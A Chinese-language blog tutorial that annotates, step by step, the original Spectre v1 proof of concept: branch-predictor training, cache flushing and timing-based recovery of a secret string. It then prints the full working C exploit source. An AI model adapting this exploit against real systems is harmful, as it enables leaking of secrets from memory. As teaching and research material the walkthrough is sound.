intel：spectre&Meltdown側信道攻擊（二）

時間 2020-08-01

標籤 intel spectre&meltdown spectre meltdown 信道攻擊欄目 Intel 简体版

原文原文鏈接

　　上一篇介紹了spectre&meltdown的基本原理和簡單的demo方案，今天繼續學習該漏洞發現團隊原始的POC：https://spectreattack.com/spectre.pdf

　　一、先展現一下運行結果，便於有個直觀的認識：從打印的結果來看，成功猜出了secret字符串的內容；

　　二、下面詳細解讀代碼

（1）整個漏洞利用最核心的兩條指令是rdtscp和clflush，其對應的intrinsic函數（__rdtscp、_mm_clflush）都在下面的頭文件裏聲明：MSVC下是intrin.h，其餘編譯器下是x86intrin.h；

#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

　　（2）array1：attacker用來訪問victim的數組。這裏聲明了160字節（邊界檢查使用的array1_size則是16），但後續會傳入很大的下標，越過數組定義時的邊界，達到訪問victim內存的目的；

unused1和unused2：多核cpu的每一個核都有各自的L1和L2緩存；緩存以line做爲基本單元，每一個cache line有64字節；unused1和unused2各64字節，恰好各填滿1個cache line（共2個），array1有160字節，佔用3個cache line；

這3個數組一共佔用5個不同的cache line；

　　　　 array2：secret的每一個單位是1byte，取值範圍是0~255，因此須要256個探測位置（「橫座標」是256）；相鄰兩個探測位置相隔512字節（「縱座標」是512），大於64字節（即512bit）的cache line，保證每一個取值都對應互不相同的cache line；

uint8_t unused1[64];// padding, useful to ensure we hit different cache lines; on many processors (e.g. Intel i3, i5, i7, ARM Cortex A53, etc.) the L1 cache has 64 bytes per line
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };// a shared memory space between the victim and the attacker; only the first 16 entries are non-zero
uint8_t unused2[64];// padding, useful to ensure we hit different cache lines; on many processors (e.g. Intel i3, i5, i7, ARM Cortex A53, etc.) the L1 cache has 64 bytes per line
uint8_t array2[256 * 512];// (1) each secret unit is one byte (value 0..255), so 256 probe slots are needed; (2) slots are 512 bytes apart, i.e. several 64-byte (512-bit) cache lines, so every byte value maps to its own cache line; (3) shared between the attacker and the victim

　　（3）這個是victim的數據，也就是attacker須要探測出來的數據；

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

　　（4）array1聲明的長度是160（邊界檢查使用的array1_size是16），但後面某些時候會傳入遠大於它的x，越界讀到secret的內容，並以讀到的字節爲下標訪問array2，把對應的cache line載入緩存。即便隨後發現if條件不成立，cpu回滾了寄存器的狀態，緩存裏的內容卻仍然保留；

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
/*
 * Bounds-checked gadget: when x passes the check, the byte array1[x] selects
 * which 512-byte slot of array2 is read, and the result is folded into temp.
 */
void victim_function(size_t x)
{
    if (x < array1_size)// when array1_size is not cached it must be fetched from memory, which is slow; the CPU may speculatively run the body in the meantime
    {
        temp &= array2[array1[x] * 512];// the check uses array1_size, but under a mispredicted branch x can be far out of range (e.g. malicious_x computed in main), so array1[x] reads a byte of secret
    }
}

　　（5）判斷cache是否命中的閾值，這個值是屢次實驗獲得的，不是理論推導出來的；

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold：80是屢次實驗測試獲得的，不是某些理論推導出來的 */

　　（6）保存緩存是否命中結果

for (i = 0; i < 256; i++)
        results[i] = 0;

　　（7）array2每一個元素若是已經在cpu的緩存，所有清除，避免影響後續計時；

for (i = 0; i < 256; i++)//每一個元素的緩存都清零
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

　　（8）把array1_size從cpu緩存去除；緊接着的這個空轉爲了確保array1_size的從cpu緩存清除；

 _mm_clflush(&array1_size);//array1_size從緩存去除
 for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it；volatile強制cpu從內存讀取Z的值，不然這個空轉可能被編譯器優化
 {/* Delay (can also mfence),也能夠用 mfence 替代*/
 }

　　（9）這裏計算array1的偏移座標，方法很複雜，單看代碼很難理解爲啥這麼作，不妨先打印一些結果數據看看：

x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));

　　  構造的x以下：頗有規律，每6次一個輪迴；每一個輪迴裏有5次x等於training_x（此例中是7），在array1_size的範圍內，if條件成立；另外1次（j%6==0時）x等於malicious_x，遠大於array1_size，if條件不成立；但CPU有分支預測功能，會根據該
if分支此前的執行歷史預測此次分支是否成立。前面5次分支都成立，會「誘導」cpu認爲第6次if也成立，進而推測執行temp &= array2[array1[x] * 512]的代碼，把victim內存中的字節所對應的array2元素讀到cpu
內部緩存； 計算出x以後就是調用victim_function()；

j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

　　（10）victim_function執行完後，從新從array2讀數據，並計時；耗時最短的說明在victim中存的就是這個；

/* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
            mix_i = ((i * 167) + 13) & 255;// (1) scramble the probe order so the accesses do not form a simple stride; 167 is odd, so every value 0..255 is visited exactly once  (2) & 255 == & 0xFF keeps only the low 8 bits, i.e. it is equivalent to % 256
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            /* skip the slot selected by the training index: the training calls read it on purpose */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

　　（11）接下來統計結果：在results中找出命中次數最高和次高的2個值（分別記爲j和k），若最高者明顯領先就提早結束嘗試；

/* Locate highest & second-highest results results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];

　　（12）繼續看main：這個就是從array1到目標內存的offset：

size_t malicious_x = (size_t)(secret - (char*)array1);

　　　　緊接着會傳入readMemoryByte函數去探測讀取內容：

printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);

　　（13）和http://www.javashuo.com/article/p-myuqazmn-nc.html 這個POC比，這個demo多了兩個功能：

　訓（誘）練（導）cpu的分支預測結果，讓其認爲下一個if條件是成立的，提早執行if分支
不單單能探測secret內容，還能讓用戶指定須要探測的目標地址和探測的數據長度，以下：

    if (argc == 3)//第一個參數是目標地址，第二個參數是讀取的字節數；
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer；*/
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

完整的代碼以下（精華都在註釋了）：

#include <stdio.h> 
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers */
#ifndef _MSC_VER
#define sscanf_s sscanf
#endif

/********************************************************************
Victim code.
********************************************************************/
/* Bound that victim_function() checks x against; only the first 16 entries of array1 are non-zero. */
unsigned int array1_size = 16;
/* Padding, useful to ensure we hit different cache lines. On many processors
 * (e.g. Intel i3, i5, i7, ARM Cortex A53, etc.) the L1 cache has 64 bytes per line. */
uint8_t unused1[64];
/* A shared memory space between the victim and the attacker. */
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
/* Padding, same purpose as unused1. */
uint8_t unused2[64];
/* Probe array shared by the attacker and the victim:
 * (1) each secret unit is one byte (value 0..255), so 256 probe slots are needed;
 * (2) slots are 512 bytes apart, i.e. several 64-byte (512-bit) cache lines,
 *     so every byte value maps to its own cache line. */
uint8_t array2[256 * 512];

/* Known only to the victim; this is what the attacker is trying to recover. */
char* secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
/*
 * Bounds-checked gadget: when x passes the check, the byte array1[x] selects
 * which 512-byte slot of array2 is read, and the result is folded into temp.
 */
void victim_function(size_t x)
{
    if (x < array1_size)// readMemoryByte flushes array1_size before each call, so it must be fetched from memory, which is slow; the CPU may speculatively run the body in the meantime
    {
        temp &= array2[array1[x] * 512];// the check uses array1_size, but under a mispredicted branch x can be far out of range (e.g. malicious_x computed in main), so array1[x] reads a byte of secret
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold; per the original author, 80 was found by repeated experiments, not derived theoretically */

/*
 * Try to recover the byte located at array1 + malicious_x.
 *
 * Up to 999 rounds are run. Each round flushes the probe slots of array2,
 * calls victim_function() 30 times (5 in-bounds training calls per
 * out-of-bounds call), then times a read of every probe slot and counts
 * the slots that were read within CACHE_HIT_THRESHOLD cycles.
 *
 * malicious_x: offset, relative to array1, of the byte to recover.
 * value:       out; value[0] is the best guess, value[1] the runner-up.
 * score:       out; hit counts of value[0] and value[1].
 */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
    static int results[256];/* per byte value: number of rounds in which its probe slot was a cache hit */
    int tries, i, j, k, mix_i;
    unsigned int junk = 0;
    size_t training_x, x;
    register uint64_t time1, time2;
    volatile uint8_t* addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--)
    {
        /* Flush array2[512*(0..255)] from cache */
        for (i = 0; i < 256; i++)/* evict every probe slot */
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;/* training_x = 0..15 */
        for (j = 29; j >= 0; j--)
        {
            _mm_clflush(&array1_size);/* evict array1_size so the bounds check in victim_function has to wait for memory */
            for (volatile int z = 0; z < 100; z++)/* delay intended to let the flush complete; z is volatile so the compiler cannot drop the empty loop */
            {/* Delay (can also mfence) */
            } 
            /* In every group of 6 iterations, 5 use the small in-bounds training_x so the branch is taken; the 6th uses the out-of-bounds malicious_x. The 5 in-bounds calls train the branch predictor so that the body is still executed speculatively on the 6th. */
            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);/* x is an offset relative to array1 and may point into secret */
        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
            mix_i = ((i * 167) + 13) & 255;/* (1) scramble the probe order; 167 is odd, so every value 0..255 is visited exactly once  (2) & 255 == & 0xFF keeps only the low 8 bits, i.e. it is equivalent to % 256 */
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            /* skip the slot selected by array1[training_x]: the training calls read it on purpose */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is >= 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
}

/*
 * Entry point.
 *
 * With no arguments, recovers the bytes of `secret` one at a time through
 * readMemoryByte(). With exactly two arguments, argv[1] is an absolute
 * address (parsed with %p) and argv[2] the number of bytes to read from it.
 *
 * Returns 0 on success, 1 when the two arguments cannot be parsed.
 */
int main(int argc, const char** argv)
{
    void* target = NULL;
    size_t malicious_x;
    int score[2];
    int len = (int)strlen(secret);
    uint8_t value[2];

    printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));

    /* Default target: offset of secret relative to array1. The two objects are
     * unrelated, so the difference is computed on integer addresses (direct
     * pointer subtraction across objects is undefined) and may wrap around. */
    malicious_x = (size_t)((uintptr_t)secret - (uintptr_t)array1);

    for (size_t i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

    if (argc == 3) /* argv[1] = target address, argv[2] = number of bytes to read */
    {
        /* %p stores a void*, so parse into a real pointer object rather than
         * through a cast size_t*, and reject input that does not parse. */
        if (sscanf_s(argv[1], "%p", &target) != 1 || sscanf_s(argv[2], "%d", &len) != 1)
        {
            fprintf(stderr, "Usage: %s [<address> <length>]\n", argv[0]);
            return (1);
        }
        /* Convert the absolute address into an offset relative to array1 */
        malicious_x = (size_t)((uintptr_t)target - (uintptr_t)array1);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0)
    {
        printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        /* non-printable bytes are shown as '?' */
        printf("0x%02X='%c' score=%d ", value[0],
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X='%c' score=%d)", value[1],
                (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
                score[1]);
        printf("\n");
    }
#ifdef _MSC_VER
    printf("Press ENTER to exit\n");
    getchar();    /* Pause Windows console */
#endif
    return (0);
}

參考：https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre 代碼解讀

https://bbs.pediy.com/thread-254288.htm https://xz.aliyun.com/t/6332 跨進程泄露敏感信息

https://bbs.pediy.com/thread-256190.htm Intel處理器L3 Cache側信道分析研究

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。